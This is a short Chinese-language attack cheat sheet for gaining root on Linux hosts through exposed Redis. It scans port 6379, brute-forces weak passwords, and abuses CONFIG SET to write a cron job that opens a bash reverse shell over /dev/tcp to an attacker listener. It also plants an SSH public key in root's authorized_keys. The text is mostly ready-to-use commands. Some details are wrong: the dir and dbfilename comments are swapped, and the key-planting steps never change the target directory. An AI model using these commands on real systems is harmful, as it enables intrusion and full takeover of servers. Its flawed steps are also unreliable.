Linux - Redis提权

# Redis 提权
## 一、反弹shell获取权限
### 1.扫描
`nmap -p 6379 ip段`
### 2.进行弱密码或者无密码爆破，获取redis访问权限
### 3.查看是否有系统配置写入权限
```shell
config get dir				//获取持久化配置文件名
config get dbfilename		//获取持久化文件保存路径

//如果能够获取，尝试使用使用定时任务写入反弹shell
config set dir /var/spool/cron		//root用户的定时任务文件所在目录
config set dbfilename root			//root用户的定时任务文件名
```
### 4.如果上面成功执行，那么写入定时任务
```shell
set taska "\n\n * * * * * bash -i >& /dev/tcp/ip/反弹端口 0>&1"
//保存持久化
save
```
### 5.Kali开启监听进行等待反弹命令

## 二、植入ssh私钥进行登录
### 1.扫描
`nmap -p 6379 ip段`
### 2.进行弱密码或者无密码爆破，获取redis访问权限
### 3.查看是否有系统配置写入权限
```shell
config get dir				//获取持久化配置文件名
config get dbfilename		//获取持久化文件保存路径

//如果能够获取，尝试使用使用定时任务写入反弹shell
config set dir /var/spool/cron		//root用户的定时任务文件所在目录
config set dbfilename root			//root用户的定时任务文件名
```
### 4.如果上面成功执行，那么写入定时任务
```shell
因为不知道是否存在/root/.ssh的目录。所以写入定时任务进行创建
set taska "\n\n * * * * * mkdir /root/.ssh"
//保存持久化
save
```
### 5.写入私钥
```shell
等待时间创建
config set dbfilename authorized_keys
set pub_key "\n\n 公钥 \n\n"
save
```
### 6.使用密钥连接
```shell
ssh -i 私钥地址 root@ip
```